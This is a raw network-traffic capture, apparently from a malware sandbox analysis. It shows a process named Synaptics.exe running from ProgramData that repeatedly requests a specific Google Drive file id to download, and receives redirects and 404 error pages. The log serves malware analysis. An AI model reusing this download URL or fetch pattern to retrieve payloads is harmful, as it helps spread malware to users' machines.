                                                                                              2025-01-02 19:28:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 62 5f 32 51 2d 34 46 38 6f 4d 65 4c 58 56 61 65 47 51 38 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="Hb_2Q-4F8oMeLXVaeGQ8Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:28:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              32192.168.2.749841142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:56 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7SG9ueF-zDUEHGjDaMlVzNK3MtgdWfy_NsfeNaz-Bd8LWbw6gYZ6CWjYUZOGsj8Epz00vD3lk
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:56 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0Q7aIy2pj2g5MfqRwuEnfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:56 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:28:56 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 32 51 41 6a 41 39 78 79 4a 64 41 32 2d 62 6d 67 6e 69 76 53 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="f2QAjA9xyJdA2-bmgnivSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:28:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.749842216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO
                                                                                              2025-01-02 19:28:56 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:56 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JTZdwXGdZSZA1sdnoTQiWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              34192.168.2.749850216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Z8ISdsaDgeQ-R92528VnVtLURB30Y38-aVS--eidvIefqkCEPr3CIShwBqvQNChxi78jJs_B6El_WOypI3n11rvYfqf5fJH8w9cnwSg4NbUzFQTFVkPa-k6AAbvGWHeJ6bZIGGecF_hCji0wmUDxwNYOPzmKmt0jaFEwuZae5k0dUpTZ8SV0SQRO
                                                                                              2025-01-02 19:28:57 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:57 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-jmV4eCwBoisZQOtpeNoR8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              35192.168.2.749851216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA
                                                                                              2025-01-02 19:28:57 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:57 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-TV62abhGoSoxMNute-ZEqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.749852142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:57 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7fQXYwYUAmjIR0fCsZxyzUNZbORc4_O-SRT--4C--80aig3iDBHJ29JWsmlW61Fdsh
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:57 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-lpMgTfAJ1jrHdA8-IrWTTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:57 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:28:57 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 78 72 6b 79 74 44 68 76 63 44 31 49 47 75 5a 44 47 47 36 52 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="ExrkytDhvcD1IGuZDGG6RQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:28:57 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.749853142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:57 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:57 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5a7X5JJb-Fn_H9DuYeBqKCWt-Xy7-vEVi_TBLDyR4af6snPb9HR1ISFAEMehGfKAOP
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:57 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bOesnIhNVTmNv1ZnNsAFBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:57 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:28:57 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 50 4f 6c 53 5f 6d 53 4f 62 51 48 52 79 7a 32 69 54 57 70 68 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="rPOlS_mSObQHRyz2iTWphw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:28:57 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.749860216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              39192.168.2.749861216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:57 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              40192.168.2.749870216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:58 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
